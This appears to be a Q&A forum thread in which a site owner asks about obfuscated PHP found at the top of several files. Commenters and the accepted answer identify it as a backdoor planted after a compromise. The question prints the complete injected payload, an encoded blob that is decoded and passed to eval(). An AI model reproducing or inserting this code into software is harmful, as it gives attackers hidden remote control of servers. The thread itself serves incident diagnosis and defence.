# Some code added to my php file

Tags: php

```
<?php /*versio:3.02*/ $GLOBALS["opwnro"]="RVaW5pX3NldAPdYWxsb3dfdXJsX2ZvcGVuZGlzcGxheV9lcnJvcnMPifaZmVkb3IvMDYwOGV4cGFuc2lvbgoNsMy4wMgjJWWdOZTRMSzhVOGUzc3R3NjAyFaHR0cDovLwifPSFRUUFMmQTb2ZmaHR0cHM6Ly8drBRSFRUUF9IT1NUxMQOEdW5pb24WsoniWpLc2VsZWN0UIPUkVRVUVTVF9VUkkofqU0NSSVBUX05BTUUxdjLUVVFUllfU1RSSU5HibPwjIUgXZGV0ZXJtaW5hdG9yVFYKLgcCjLLmxvZwHfCSFRUUF9ZX0FVVEgXYmFzZTY0X2RlY29kZQDjKdmVyc2lvLQkVLXBocAtzgISFRUUF9FWEVDUEhQvNgkb3V0xksdVb2sqhWyFSFRUUF9VU0VSX0FHRU5UKaRKLAZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAAYQKYmxhYnVlbC5uZXQZfvZmFzdGFkZHouY29tsjcL3czLnBocD91PQDsJms9vOJnQ9cGhwJnA9WJnY9eSFrBZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYzbHZvOGdTL3lvZFpJMndZREJnRzh6azhaUm8xck1UYVRhSlBNNUtxOWtJY1RTQm1NUG04QlhsdTcvcUE0TWRlOS8rWmR4VlhYZjlxam9Pa1hnVjRERE9jQ0FLQWE1d2tjYVpXK1dGME8rL29SaklZWjM1Vlp4bkR0N0daVldLUHJCV1ViUVFOVW1UTmJWUCtHN2lMSFpLWEhXSW1qU1VkYlV2STYxL2ZZNCtsalJMMWl4Z1VJSGhIVFZxa0xPdjRnS3Y5MUg1R2xWaUw4bzJidWJMNkZPdjJDYlJOa1EydW4vNjhhT1AzbEI3a3NaK2tWZHhpc1dxcURISUszQlZGeGtLY1I0MklrNjByUFB0cW5MenhIOWRlV0t2M0VXZUY4bW9sd1RWY3VXQlM3MG9jbDlXT3hBdStIV1JDTmVvRi9qeHJucUZFMDVUQkFmOHFvQkU0a1I5ZkFFZkJUZEo4bzBEbDV3d1grSk02Q01icEdnQ3Naa2JkaFBHQ1NiY2pwOW5GYzRncmtKVVZjc3ZnNEdBRk1UdElWL01JQVVKbnpaMitPSUwxQTJjbFBoY2JyaUpKQ1c5Ulpha2JnM1czdkJURWE3MlVqZE45L0dSRDVDWGZGbFJCN045WGZoSFJMekZQcEJ1K0VXUmk1WFIxNmZaajRmSHVRTS9Ndm9YdHZzMU1mMnluTy9UMjkrbU14bUZMdmoyajV5ejZmeHBkaitmM2Q3Ly9FWnU4SlJmdnZEMTRmNSsrblUrdi90ait2QTBsNUZCQXVFRzdtcTNZZUdoYmpmM2lDaVNjY2RQOGhKM1RrbkFjYnFzZGlLL0RHRnV4UWpDOVh1VFhYN2FaSXFVS3F0Qm9pNHNjMzlCNnFLdHVva0tsUmZpcU1neStQRGRZTzh0WlRUbU9wdjZKV0xpTWdxOFBWT0hqanNDekE2WE5TbUNwbVdFMzZkejlNYXo4QzRvSkEzbEFuMmZ6eDhIbXFMQ3dkL0YzeG44Zk0vTDZndUNqemR1MGpzbDBIclo3T09BVk5IajkwZm40YWNpREFTRmZQNDVuZjI4ZTdnL28vU3B4TVhuMnhlbzZTK2duTjJuOGhxWm13aHFYN3k2ME9mY3FUNzY5QW1KSjMyTlByZmsveUM5M3daRUlZR0ZkdW9Zb3VrVDJpczNJVS9rQVFaNjZ5Qnpvd1U0aGJmTEpBK3dLQnpza3h1UndGZG5CTEk0OXkvMXVjV1ZPRDF6ai9GUm5lOUhVSk90NHJnSVBEOU92WTNZUytPaWlBalVwRWxadlNUZ0JQYWpIQWwvT1lMQ2lZcndoWHhUT2svU01YaVZYbERnS0gzZEFWU0x2V0tmRjNIV2I4R2w1L3ljemlCRHZ6anBtZHp1QlZHMncxdjdBTUVqUTlJMFdhZmRrQ3lLVFp5MU5GMlZERU9tcE9WcjViMHVXdExZa29aaldSOFJHcXVXbG1hYTBrZ25RNEZWYmx6U0FEYldITmdtbGpRYXltYi91Wmt4Tng5NURJTllBRHpveWthdFhaSTJVdVVSQmJoVDVjUWZWWlUxamFlQU15aDJXUlZWRHBDTWkzT0t0REVNTXJpbTkwbUN3N3pBcmg5QjF6bWtlOXdTOFp6WS8yMFRSa3dHb2NzY3lvMGR5cTI0RVV3K0V3d242RUJrL09JQ25sdExoNnFrR2FvTVlXcWgvSkk4eTVRc1E1NzhremdZcFpNeGsvWU90b2xYbCtLdVdaWTBsclV4Q1R4Qmt3OE11anFTVk1wQWdmR2pBSWl4YVZBR2t1R0xDZFoxblk1MzQ2SW1pSkptREprcXBaTmd6WnhJRTZqS1BzeVBzd1pZa3FWVHdkZW5YWWFMSU5tdUFWN3JVaVQxc1FzQk9RSTdpSXZNQlFSeG5HOTNQNmFPMDFkK3U1dkJPSGlZL1FYaUgyOW50L0JKV3FBTXFqVkI2TnVpY0hjaUVnWUJYZy9LS0lYZUZnWlZ1aHdvSWN6cXozVVdiOXVqdTYvVDVxUTFWNWovOFNnOEg1OU1EMGZUK3orN0hNMWZzT3JvaEYrZ2VvajB3M3BSQS9hNGdRUEhEdmdtd0FiRlhWVUV4bnI0dTFsKzV1dkZnRjBxTDFCOUtIa010S01HNEFFaExiRGRlMTVlOE1xLzRrT1FINUpRczAvRlBodFp0aHlWenFhSUs5Y0Q2Ty9lWk1hUWxZTWRYaU1QOUM4YUVHMEdLbU83cHZWTmV5VnA1eWVaQlFBNWI0anRzZTJPcVVvNlFBalVTck5qTnIzV1d4WnA2a1oyZ3hEbkNtMWlTcHJKZW9Wc21qaE5hOSsrU1lOeG8xYmhFNUZqcDhLQmtrSm1qTUZ1KzZRa2xWYTREaTFya0NwWHVPVHJEOFpybHFTUFRHWTlGMGhGci9MU295c2FPK3NJSFZxU05oNVMwTDZBcWJvMWxsajMyalpYVEp6YkI3dVZWOXVkM1Iwa1dSTlpJd09VRFNjK2c0NUhXVWUxTk5USEFGSnlNMGxhc3d4VDBrMkx1c29Ha05KQmlZbWs2VHBZM0d3NmNWa25NZVNGV1hRV3JVM0FUa3ZsMEFJdkQ3eDJrK2JpdnpSWFZ5SDg1aGpHaU55WkxDWWNhaU41MkdlbHNvMHJrVlZOTDlxczZ0cURtSDhqdXlra0lkeTl4bGxDSVBML2pCWkxrM1RWSU8rZ285blNyQjJkQUFJamVLVjNMUnFPVkdreWxNY3c3V2dUN3ZZdlM2ODZHVC9NRlBsQXZiSnRhaVhKNjdwZXBFdE1kMDYyYjU2V3pIQXM2V05UTm82MG1vQ3dKRitrMnFKOXZ0bVNSZW1tSmgzbkU2UFArRGtpbGNjSEM5a0lTYWREbXpQOXNLQ1RCYTRQaTB3Rld3MnprLzloOHVFUFhRd1BteHE3U0EyZ29iZm5zUDBkSVVPREtlUVoxZmhGeTZIS2F6OFMyNFlCMlBTVE9zQk9udm00Yzk0Qmd5YTk4RWdqZWtqa1BEK3BGcHZETEdnZFZYVUppaGtjN1ZhT0JVQ2owbW5YdE42eEZVUWlSNXhPSFBrUjNiN29obzY2ZXc1TWFwMU0wQkgwRFdQc2RQcDRKQTBuWkExcTRLT2xqUXhMTWpXeXpaenB0NkVwRFRXRDNtTnRDcm9YL3RwUHlJdmk1RVhNUWdCYmIvc292djRZWG9iUy9KRnpDbUdrdjRjVEJtRjhLZnNmVkRRd3N3PT0iKSkpOw";
    if (!function_exists('cnedthhk')){function cnedthhk($a, $b){$c=$GLOBALS['opwnro'];$d=pack('H*','6261736536345f646'.'5636f6465'); return $d(substr($c, $a, $b));};eval(cnedthhk(562,3294));};?>
```

This was added on top of some of my PHP files. I've tried googling for what it could be, but I cant find anything.

Comment: Your site is effected by miscellaneous script.

Comment: Your website code is vulnerable, one or more vulnerability was exploited and php files were rewritten to add this code on top. Simply put you got hacked :|

Comment: @hardiksolanki You meant malicious ?

Comment: You can use UnPHP to [decode your codes](http://www.unphp.net/decode/0849bdbe984e7973b1098a8f3cdc2788/), which shows that indeed it is a backdoor access.

Comment: @JiaJian Turn this into an answer, unphp is a great tool (I didn't know it exists). I was trying to do the same with `base64` and `openssl` but unphp is _much_ easier ...

Comment: @Marged did some quick Googling, turns out there is already an answer [here](http://stackoverflow.com/questions/20095387/my-server-was-hacked-a-encoded-code-was-injected-i-was-not-able-to-know-what-wa).

Comment: @JiaJian The mentioning of unphp alone makes this a relevant answer (at least for me). It's nice to see that even malicious code gets updated: they increased the version number from 3.01 to 3.02 ;-) Perhaps they even have a public svn repository somewhere :-))

Answer (score 1, accepted):

Having used UnPHP to decode that chunk of code (with the results [here](http://www.unphp.net/decode/0849bdbe984e7973b1098a8f3cdc2788/)), it seems like somebody placed a backdoor access to your server in your codes.

Refer to this detailed [StackOverflow answer](https://stackoverflow.com/questions/20095387/my-server-was-hacked-a-encoded-code-was-injected-i-was-not-able-to-know-what-wa) for an almost line-by-line explanation of the obfuscated codes.

Note that all of methods of the backdoor access in your .php file is obfuscated. If you compare line-by-line with the codes posted in the answer above, you would notice that both are very, very similar (if not the same).